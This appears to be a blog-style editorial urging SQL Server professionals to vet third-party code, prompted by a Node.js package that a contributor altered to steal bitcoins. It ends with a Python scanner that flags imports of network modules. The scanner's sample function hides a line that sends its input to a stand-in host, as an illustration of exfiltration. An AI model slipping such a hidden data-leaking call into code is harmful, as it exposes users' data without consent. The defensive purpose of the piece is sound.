Many languages have libraries available for use, but most require that a developer download them, include them in their software, and then publish the result. In many Node.js applications, the developer does some of this, but when they publish the application, the users pull down the versions of the packages that they need at that time. This lets developers avoid bundling a lot of code with their applications, which reduces file sizes and bandwidth.
Recently an issue arose with a popular package that is included in many applications. I first noticed this on Twitter, then saw it called out in a Visual Studio User Group meeting, and then saw even more about it online. A programmer made some helpful changes to the package and was given rights to make more by the maintainer. This user then altered the package to include malware that would attempt to steal bitcoins from users who ran an application using the package.
This is very different from how our T-SQL code is structured, with all the code contained inside the database. There are some exceptions, but for the most part we can look at all the code that will be executed as part of our batch. That doesn’t mean that we aren’t responsible for reviewing and checking out code.
Part of our duty as professionals is to be careful with code that we get from others: run it in a sandbox, test it, and make sure it will work well for us. Not many of us can download code from the web and have it run on our SQL Server without modification, but if we’re asking questions on a forum, we might just do that. If the problem is complex and the code is large, we might not pay enough attention. As SQL Server expands to run code in R, Python, Java, and more, we may need to be more diligent in scanning code for problems such as data leakage.
Can you imagine getting some Python code from the web that should break strings apart into words, and then finding out that somewhere in the complex class structures this code also sends a copy of your data to some malicious website? I can, and it’s why I’d be very careful vetting code on the data platform.
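As a rough illustration of what a first-pass scan might look like, here is a minimal sketch that uses Python's standard `ast` module to flag imports of modules that can open network connections. The watch list, the function name `find_network_imports`, and the sample script are all hypothetical, made up for this example. This is only one possible starting point, not a complete vetting process.

```python
import ast

# Hypothetical watch list: modules that can open network connections.
# A real review would tune this list for its own environment.
NETWORK_MODULES = {"socket", "ssl", "http", "urllib", "ftplib", "smtplib", "requests"}


def find_network_imports(source: str) -> list:
    """Return sorted (line number, module name) pairs for watched imports."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            # node.module is None for relative imports such as "from . import x"
            names = [node.module or ""]
        else:
            continue
        for name in names:
            # Compare only the top-level package, e.g. "urllib" in "urllib.request"
            if name.split(".")[0] in NETWORK_MODULES:
                findings.append((node.lineno, name))
    return sorted(findings)


# A made-up "string splitter" that quietly sends its input somewhere else.
# The sample is only parsed here, never executed.
SAMPLE = '''\
import os
import urllib.request

def split_words(text):
    urllib.request.urlopen("http://example.invalid/?d=" + text)
    return text.split()
'''

if __name__ == "__main__":
    for lineno, module in find_network_imports(SAMPLE):
        print(f"line {lineno}: imports {module}")
```

A check like this only catches plain `import` statements. Code that loads modules dynamically, or hides its behavior behind `exec`, would slip past it, so I'd treat it as a filter that tells me where to look first, not a replacement for a sandbox and a careful read.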